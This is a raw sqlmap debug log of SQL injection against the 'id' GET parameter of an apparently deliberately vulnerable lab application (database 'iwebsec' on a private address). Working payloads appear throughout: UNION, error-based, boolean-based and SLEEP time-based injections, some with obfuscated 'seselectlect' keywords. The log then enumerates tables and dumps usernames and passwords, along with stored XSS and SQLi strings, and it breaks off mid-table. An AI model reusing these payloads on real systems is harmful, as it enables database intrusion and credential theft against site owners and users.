[00:58:46] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)' because the payload for error-based has already been identified
[00:58:46] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)' because the payload for error-based has already been identified
[00:58:46] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)' because the payload for error-based has already been identified
[00:58:46] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)' because the payload for error-based has already been identified
[00:58:46] [DEBUG] skipping test 'Firebird AND error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
[00:58:46] [DEBUG] skipping test 'Firebird OR error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
[00:58:46] [DEBUG] skipping test 'MonetDB AND error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
[00:58:46] [DEBUG] skipping test 'MonetDB OR error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
[00:58:46] [DEBUG] skipping test 'Vertica AND error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
[00:58:46] [DEBUG] skipping test 'Vertica OR error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
[00:58:46] [DEBUG] skipping test 'IBM DB2 AND error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
[00:58:46] [DEBUG] skipping test 'IBM DB2 OR error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
[00:58:46] [DEBUG] skipping test 'PostgreSQL error-based - Parameter replace' because the payload for error-based has already been identified
[00:58:46] [DEBUG] skipping test 'PostgreSQL error-based - Parameter replace (GENERATE_SERIES)' because the payload for error-based has already been identified
[00:58:46] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - Parameter replace' because the payload for error-based has already been identified
[00:58:46] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)' because the payload for error-based has already been identified
[00:58:46] [DEBUG] skipping test 'Oracle error-based - Parameter replace' because the payload for error-based has already been identified
[00:58:46] [DEBUG] skipping test 'Firebird error-based - Parameter replace' because the payload for error-based has already been identified
[00:58:46] [DEBUG] skipping test 'IBM DB2 error-based - Parameter replace' because the payload for error-based has already been identified
[00:58:46] [DEBUG] skipping test 'PostgreSQL error-based - ORDER BY, GROUP BY clause' because the payload for error-based has already been identified
[00:58:46] [DEBUG] skipping test 'PostgreSQL error-based - ORDER BY, GROUP BY clause (GENERATE_SERIES)' because the payload for error-based has already been identified
[00:58:46] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - ORDER BY clause' because the payload for error-based has already been identified
[00:58:46] [DEBUG] skipping test 'Oracle error-based - ORDER BY, GROUP BY clause' because the payload for error-based has already been identified
[00:58:46] [DEBUG] skipping test 'Firebird error-based - ORDER BY clause' because the payload for error-based has already been identified
[00:58:46] [DEBUG] skipping test 'IBM DB2 error-based - ORDER BY clause' because the payload for error-based has already been identified
[00:58:46] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)' because the payload for error-based has already been identified
[00:58:46] [DEBUG] skipping test 'PostgreSQL inline queries' because its declared DBMS is different than identified
[00:58:46] [DEBUG] skipping test 'Microsoft SQL Server/Sybase inline queries' because its declared DBMS is different than identified
[00:58:46] [DEBUG] skipping test 'Oracle inline queries' because its declared DBMS is different than identified
[00:58:46] [DEBUG] skipping test 'SQLite inline queries' because its declared DBMS is different than identified
[00:58:46] [DEBUG] skipping test 'Firebird inline queries' because its declared DBMS is different than identified
[00:58:46] [DEBUG] skipping test 'PostgreSQL > 8.1 stacked queries (comment)' because its declared DBMS is different than identified
[00:58:46] [DEBUG] skipping test 'PostgreSQL > 8.1 stacked queries' because its declared DBMS is different than identified
[00:58:46] [DEBUG] skipping test 'PostgreSQL stacked queries (heavy query - comment)' because its declared DBMS is different than identified
[00:58:46] [DEBUG] skipping test 'PostgreSQL stacked queries (heavy query)' because its declared DBMS is different than identified
[00:58:46] [DEBUG] skipping test 'PostgreSQL < 8.2 stacked queries (Glibc - comment)' because its declared DBMS is different than identified
[00:58:46] [DEBUG] skipping test 'PostgreSQL < 8.2 stacked queries (Glibc)' because its declared DBMS is different than identified
[00:58:46] [DEBUG] skipping test 'Microsoft SQL Server/Sybase stacked queries (comment)' because its declared DBMS is different than identified
[00:58:46] [DEBUG] skipping test 'Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)' because its declared DBMS is different than identified
[00:58:46] [DEBUG] skipping test 'Microsoft SQL Server/Sybase stacked queries' because its declared DBMS is different than identified
[00:58:46] [DEBUG] skipping test 'Microsoft SQL Server/Sybase stacked queries (DECLARE)' because its declared DBMS is different than identified
[00:58:46] [DEBUG] skipping test 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' because its declared DBMS is different than identified
[00:58:46] [DEBUG] skipping test 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)' because its declared DBMS is different than identified
[00:58:46] [DEBUG] skipping test 'Oracle stacked queries (heavy query - comment)' because its declared DBMS is different than identified
[00:58:46] [DEBUG] skipping test 'Oracle stacked queries (heavy query)' because its declared DBMS is different than identified
[00:58:46] [DEBUG] skipping test 'Oracle stacked queries (DBMS_LOCK.SLEEP - comment)' because its declared DBMS is different than identified
[00:58:46] [DEBUG] skipping test 'Oracle stacked queries (DBMS_LOCK.SLEEP)' because its declared DBMS is different than identified
[00:58:46] [DEBUG] skipping test 'Oracle stacked queries (USER_LOCK.SLEEP - comment)' because its declared DBMS is different than identified
[00:58:46] [DEBUG] skipping test 'Oracle stacked queries (USER_LOCK.SLEEP)' because its declared DBMS is different than identified
[00:58:46] [DEBUG] skipping test 'IBM DB2 stacked queries (heavy query - comment)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'IBM DB2 stacked queries (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'SQLite > 2.0 stacked queries (heavy query - comment)' because its declared DBMS is different than identified
[00:58:46] [DEBUG] skipping test 'SQLite > 2.0 stacked queries (heavy query)' because its declared DBMS is different than identified
[00:58:46] [DEBUG] skipping test 'Firebird stacked queries (heavy query - comment)' because its declared DBMS is different than identified
[00:58:46] [DEBUG] skipping test 'Firebird stacked queries (heavy query)' because its declared DBMS is different than identified
[00:58:46] [DEBUG] skipping test 'SAP MaxDB stacked queries (heavy query - comment)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'SAP MaxDB stacked queries (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'HSQLDB >= 1.7.2 stacked queries (heavy query - comment)' because its declared DBMS is different than identified
[00:58:46] [DEBUG] skipping test 'HSQLDB >= 1.7.2 stacked queries (heavy query)' because its declared DBMS is different than identified
[00:58:46] [DEBUG] skipping test 'HSQLDB >= 2.0 stacked queries (heavy query - comment)' because its declared DBMS is different than identified
[00:58:46] [DEBUG] skipping test 'HSQLDB >= 2.0 stacked queries (heavy query)' because its declared DBMS is different than identified
[00:58:46] [DEBUG] skipping test 'PostgreSQL > 8.1 AND time-based blind' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'PostgreSQL > 8.1 OR time-based blind' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'PostgreSQL > 8.1 AND time-based blind (comment)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'PostgreSQL > 8.1 OR time-based blind (comment)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'PostgreSQL AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'PostgreSQL OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'PostgreSQL AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'PostgreSQL OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Microsoft SQL Server/Sybase time-based blind (IF)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Microsoft SQL Server/Sybase time-based blind (IF - comment)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Oracle AND time-based blind' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Oracle OR time-based blind' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Oracle AND time-based blind (comment)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Oracle OR time-based blind (comment)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Oracle AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Oracle OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Oracle AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Oracle OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'IBM DB2 AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'IBM DB2 OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'IBM DB2 AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'IBM DB2 OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'SQLite > 2.0 AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'SQLite > 2.0 OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'SQLite > 2.0 AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'SQLite > 2.0 OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Firebird >= 2.0 AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Firebird >= 2.0 OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Firebird >= 2.0 AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Firebird >= 2.0 OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'SAP MaxDB AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'SAP MaxDB OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'SAP MaxDB AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'SAP MaxDB OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'HSQLDB >= 1.7.2 AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'HSQLDB >= 1.7.2 OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'HSQLDB >= 1.7.2 AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'HSQLDB >= 1.7.2 OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'HSQLDB > 2.0 AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'HSQLDB > 2.0 OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'HSQLDB > 2.0 AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'HSQLDB > 2.0 OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Informix AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Informix OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Informix AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Informix OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'PostgreSQL > 8.1 time-based blind - Parameter replace' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'PostgreSQL time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Oracle time-based blind - Parameter replace (heavy queries)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'SQLite > 2.0 time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Firebird time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'SAP MaxDB time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'IBM DB2 time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'HSQLDB >= 1.7.2 time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'HSQLDB > 2.0 time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Informix time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'PostgreSQL time-based blind - ORDER BY, GROUP BY clause (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Oracle time-based blind - ORDER BY, GROUP BY clause (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'HSQLDB >= 1.7.2 time-based blind - ORDER BY, GROUP BY clause (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'HSQLDB > 2.0 time-based blind - ORDER BY, GROUP BY clause (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[00:58:46] [PAYLOAD] >= 5.0.12
[00:58:46] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[00:58:46] [PAYLOAD] 1 order by 1-- -
[00:58:46] [PAYLOAD] 1 order by 1092-- -
[00:58:46] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[00:58:46] [PAYLOAD] 1 order by 10-- -
[00:58:46] [PAYLOAD] 1 order by 6-- -
[00:58:46] [PAYLOAD] 1 order by 4-- -
[00:58:46] [PAYLOAD] 1 order by 3-- -
[00:58:46] [INFO] target URL appears to have 3 columns in query
[00:58:46] [PAYLOAD] 1 union all seselectlect null,concat(0x716a6a6271,0x4249474e515a426f4f424358795242657a5a7a4b645569637879534b714e66504a6f776465554d76,0x717a787671),null-- -
[00:58:46] [PAYLOAD] 1 union all seselectlect null,concat(0x716a6a6271,0x4249474e515a426f4f424358795242657a5a7a4b645569637879534b714e66504a6f776465554d76,0x717a787671),null union all seselectlect null,concat(0x716a6a6271,0x6975706b41617a6859567274445942444d5072616f4b594d646d4159645758466f50794f54614155,0x717a787671),null-- -
[00:58:46] [PAYLOAD] 1 union all seselectlect null,concat(0x716a6a6271,0x4249474e515a426f4f424358795242657a5a7a4b645569637879534b714e66504a6f776465554d76,0x717a787671),null from (seselectlect 0 as hgjt union seselectlect 1 union seselectlect 2 union seselectlect 3 union seselectlect 4 union seselectlect 5 union seselectlect 6 union seselectlect 7 union seselectlect 8 union seselectlect 9 union seselectlect 10 union seselectlect 11 union seselectlect 12 union seselectlect 13 union seselectlect 14) as sxxx-- -
[00:58:46] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
[00:58:46] [DEBUG] skipping test 'Generic UNION query (random number) - 1 to 20 columns' because the payload for UNION query has already been identified
[00:58:46] [DEBUG] skipping test 'Generic UNION query (NULL) - 21 to 40 columns' because the payload for UNION query has already been identified
[00:58:46] [DEBUG] skipping test 'Generic UNION query (random number) - 21 to 40 columns' because the payload for UNION query has already been identified
[00:58:46] [DEBUG] skipping test 'Generic UNION query (NULL) - 41 to 60 columns' because the payload for UNION query has already been identified
[00:58:46] [DEBUG] skipping test 'Generic UNION query (random number) - 41 to 60 columns' because the payload for UNION query has already been identified
[00:58:46] [DEBUG] skipping test 'Generic UNION query (NULL) - 61 to 80 columns' because the payload for UNION query has already been identified
[00:58:46] [DEBUG] skipping test 'Generic UNION query (random number) - 61 to 80 columns' because the payload for UNION query has already been identified
[00:58:46] [DEBUG] skipping test 'Generic UNION query (NULL) - 81 to 100 columns' because the payload for UNION query has already been identified
[00:58:46] [DEBUG] skipping test 'Generic UNION query (random number) - 81 to 100 columns' because the payload for UNION query has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL UNION query (NULL) - 1 to 20 columns' because the payload for UNION query has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL UNION query (random number) - 1 to 20 columns' because the payload for UNION query has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL UNION query (NULL) - 21 to 40 columns' because the payload for UNION query has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL UNION query (random number) - 21 to 40 columns' because the payload for UNION query has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL UNION query (NULL) - 41 to 60 columns' because the payload for UNION query has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL UNION query (random number) - 41 to 60 columns' because the payload for UNION query has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL UNION query (NULL) - 61 to 80 columns' because the payload for UNION query has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL UNION query (random number) - 61 to 80 columns' because the payload for UNION query has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL UNION query (NULL) - 81 to 100 columns' because the payload for UNION query has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL UNION query (random number) - 81 to 100 columns' because the payload for UNION query has already been identified
[00:58:46] [DEBUG] checking for parameter length constraining mechanisms
[00:58:46] [PAYLOAD] 1 union all seselectlect null,concat(0x716a6a6271,(case when (6669= 6669) then 1 else 0 end),0x717a787671),null-- -
[00:58:46] [DEBUG] performed 1 query in 0.01 seconds
[00:58:46] [DEBUG] checking for filtered characters
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
[00:58:46] [DEBUG] used the default behavior, running in batch mode
sqlmap identified the following injection point(s) with a total of 48 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: id=(SELECT (CASE WHEN (7615=7615) THEN 1 ELSE (SELECT 3806 UNION SELECT 2800) END))
Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 7705 FROM(SELECT COUNT(*),CONCAT(0x716a6a6271,(SELECT (ELT(7705=7705,1))),0x717a787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 5392 FROM (SELECT(SLEEP(5)))UzRb)
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=1 UNION ALL SELECT NULL,CONCAT(0x716a6a6271,0x4249474e515a426f4f424358795242657a5a7a4b645569637879534b714e66504a6f776465554d76,0x717a787671),NULL-- -
Vector: UNION ALL SELECT NULL,[QUERY],NULL-- -
---
[00:58:46] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[00:58:46] [INFO] the back-end DBMS is MySQL
[00:58:46] [PAYLOAD] 1 union all seselectlect null,concat(0x716a6a6271,(case when (version() like 0x254d61726961444225) then 1 else 0 end),0x717a787671),null-- -
[00:58:46] [DEBUG] performed 1 query in 0.01 seconds
[00:58:46] [PAYLOAD] 1 union all seselectlect null,concat(0x716a6a6271,(case when (version() like 0x255469444225) then 1 else 0 end),0x717a787671),null-- -
[00:58:46] [DEBUG] performed 1 query in 0.01 seconds
[00:58:46] [PAYLOAD] 1 union all seselectlect null,concat(0x716a6a6271,(case when (@@version_comment like 0x256472697a7a6c6525) then 1 else 0 end),0x717a787671),null-- -
[00:58:46] [DEBUG] performed 1 query in 0.01 seconds
[00:58:46] [PAYLOAD] 1 union all seselectlect null,concat(0x716a6a6271,(case when (@@version_comment like 0x25506572636f6e6125) then 1 else 0 end),0x717a787671),null-- -
[00:58:46] [DEBUG] performed 1 query in 0.00 seconds
[00:58:46] [PAYLOAD] 1 union all seselectlect null,concat(0x716a6a6271,(case when (aurora_version() like 0x25) then 1 else 0 end),0x717a787671),null-- -
[00:58:46] [DEBUG] turning off NATIONAL CHARACTER casting
[00:58:46] [PAYLOAD] 1 union all seselectlect null,concat(0x716a6a6271,(case when (aurora_version() like 0x25) then 1 else 0 end),0x717a787671),null-- -
[00:58:46] [DEBUG] performed 2 queries in 0.01 seconds
web server operating system: Linux CentOS 6
web application technology: Apache 2.2.15, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
[00:58:46] [INFO] fetching current database
[00:58:46] [PAYLOAD] 1 union all seselectlect null,concat(0x716a6a6271,ifnull(cast(database() as char),0x20),0x717a787671),null-- -
[00:58:46] [DEBUG] performed 1 query in 0.01 seconds
current database: 'iwebsec'
[00:58:46] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[00:58:46] [INFO] fetching current database
[00:58:46] [INFO] fetching tables for database: 'iwebsec'
[00:58:46] [PAYLOAD] 1 union all seselectlect null,concat(0x716a6a6271,json_arrayagg(concat_ws(0x61666c6e6473,table_name)),0x717a787671),null from information_schema.tables where table_schema in (0x69776562736563)-- -
[00:58:46] [PAYLOAD] 1 union all seselectlect null,concat(0x716a6a6271,ifnull(cast(table_name as char),0x20),0x717a787671),null from information_schema.tables where table_schema in (0x69776562736563)-- -
[00:58:46] [DEBUG] performed 2 queries in 0.02 seconds
[00:58:46] [INFO] fetching columns for table 'users' in database 'iwebsec'
[00:58:46] [PAYLOAD] 1 union all seselectlect null,concat(0x716a6a6271,json_arrayagg(concat_ws(0x61666c6e6473,column_name,column_type)),0x717a787671),null from information_schema.columns where table_name=0x7573657273 and table_schema=0x69776562736563-- -
[00:58:46] [PAYLOAD] 1 union all seselectlect null,concat(0x716a6a6271,ifnull(cast(column_name as char),0x20),0x61666c6e6473,ifnull(cast(column_type as char),0x20),0x717a787671),null from information_schema.columns where table_name=0x7573657273 and table_schema=0x69776562736563-- -
[00:58:46] [DEBUG] performed 2 queries in 0.02 seconds
[00:58:46] [INFO] fetching entries for table 'users' in database 'iwebsec'
[00:58:46] [DEBUG] stripping ORDER BY clause from statement because it does not play well with UNION query SQL injection
[00:58:46] [PAYLOAD] 1 union all seselectlect null,concat(0x716a6a6271,json_arrayagg(concat_ws(0x61666c6e6473,password,role,username)),0x717a787671),null from iwebsec.users-- -
[00:58:46] [PAYLOAD] 1 union all seselectlect null,concat(0x716a6a6271,ifnull(cast(password as char),0x20),0x61666c6e6473,ifnull(cast(role as char),0x20),0x61666c6e6473,ifnull(cast(username as char),0x20),0x717a787671),null from iwebsec.users-- -
[00:58:46] [DEBUG] performed 2 queries in 0.02 seconds
[00:58:46] [DEBUG] analyzing table dump for possible password hashes
Database: iwebsec
Table: users
[1 entry]
+-------+-------------+----------+
| role | password | username |
+-------+-------------+----------+
| admin | mall123mall | orange |
+-------+-------------+----------+
[00:58:46] [INFO] table 'iwebsec.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/users.csv'
[00:58:46] [INFO] fetching columns for table 'xss' in database 'iwebsec'
[00:58:46] [PAYLOAD] 1 union all seselectlect null,concat(0x716a6a6271,json_arrayagg(concat_ws(0x61666c6e6473,column_name,column_type)),0x717a787671),null from information_schema.columns where table_name=0x787373 and table_schema=0x69776562736563-- -
[00:58:46] [PAYLOAD] 1 union all seselectlect null,concat(0x716a6a6271,ifnull(cast(column_name as char),0x20),0x61666c6e6473,ifnull(cast(column_type as char),0x20),0x717a787671),null from information_schema.columns where table_name=0x787373 and table_schema=0x69776562736563-- -
[00:58:46] [DEBUG] performed 2 queries in 0.02 seconds
[00:58:46] [INFO] fetching entries for table 'xss' in database 'iwebsec'
[00:58:46] [PAYLOAD] 1 union all seselectlect null,concat(0x716a6a6271,json_arrayagg(concat_ws(0x61666c6e6473,id,name)),0x717a787671),null from iwebsec.xss-- -
[00:58:46] [PAYLOAD] 1 union all seselectlect null,concat(0x716a6a6271,ifnull(cast(id as char),0x20),0x61666c6e6473,ifnull(cast(name as char),0x20),0x717a787671),null from iwebsec.xss-- -
[00:58:46] [DEBUG] performed 2 queries in 0.02 seconds
[00:58:46] [DEBUG] analyzing table dump for possible password hashes
Database: iwebsec
Table: xss
[5 entries]
+----+------------------------------------+
| id | name |
+----+------------------------------------+
| 7 | <img src=1 onerror=alert(/ctfs/)/> |
| 6 | <img src=1 onerror=alert(/ctfs/)/> |
| 5 | <img src=1 onerror=alert(/ctfs/)/> |
| 1 | iwebsec |
| 8 | <?php phpinfo();?> |
+----+------------------------------------+
[00:58:46] [INFO] table 'iwebsec.xss' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/xss.csv'
[00:58:46] [INFO] fetching columns for table 'sqli' in database 'iwebsec'
[00:58:46] [PAYLOAD] 1 union all seselectlect null,concat(0x716a6a6271,json_arrayagg(concat_ws(0x61666c6e6473,column_name,column_type)),0x717a787671),null from information_schema.columns where table_name=0x73716c69 and table_schema=0x69776562736563-- -
[00:58:47] [PAYLOAD] 1 union all seselectlect null,concat(0x716a6a6271,ifnull(cast(column_name as char),0x20),0x61666c6e6473,ifnull(cast(column_type as char),0x20),0x717a787671),null from information_schema.columns where table_name=0x73716c69 and table_schema=0x69776562736563-- -
[00:58:47] [DEBUG] performed 2 queries in 0.02 seconds
[00:58:47] [INFO] fetching entries for table 'sqli' in database 'iwebsec'
[00:58:47] [PAYLOAD] 1 union all seselectlect null,concat(0x716a6a6271,json_arrayagg(concat_ws(0x61666c6e6473,email,id,password,username)),0x717a787671),null from iwebsec.sqli-- -
[00:58:47] [PAYLOAD] 1 union all seselectlect null,concat(0x716a6a6271,ifnull(cast(email as char),0x20),0x61666c6e6473,ifnull(cast(id as char),0x20),0x61666c6e6473,ifnull(cast(password as char),0x20),0x61666c6e6473,ifnull(cast(username as char),0x20),0x717a787671),null from iwebsec.sqli-- -
[00:58:47] [DEBUG] performed 2 queries in 0.02 seconds
[00:58:47] [DEBUG] analyzing table dump for possible password hashes
Database: iwebsec
Table: sqli
[7 entries]
+----+-----------------------+----------+------------------------------------------------------+
| id | email | password | username |
+----+-----------------------+----------+------------------------------------------------------+
| 1 | user1@iwebsec.com | pass1 | user1 |
| 2 | user2@iwebsec.com | pass2 | user2 |
| 3 | user3@iwebsec.com | pass3 | user3 |
| 4 | user4@iwebsec.com | admin | admin |
| 5 | 123@123.com | 123 | 123 |
| 6 | 1234@123.com | 123 | ctfs' or updatexml(1,concat(0x7e,(version())),0)# |
| 7 | iwebsec02@iwebsec.com | 123456 | iwebsec' or updatexml(1,concat(0x7e,(version())),0)# |
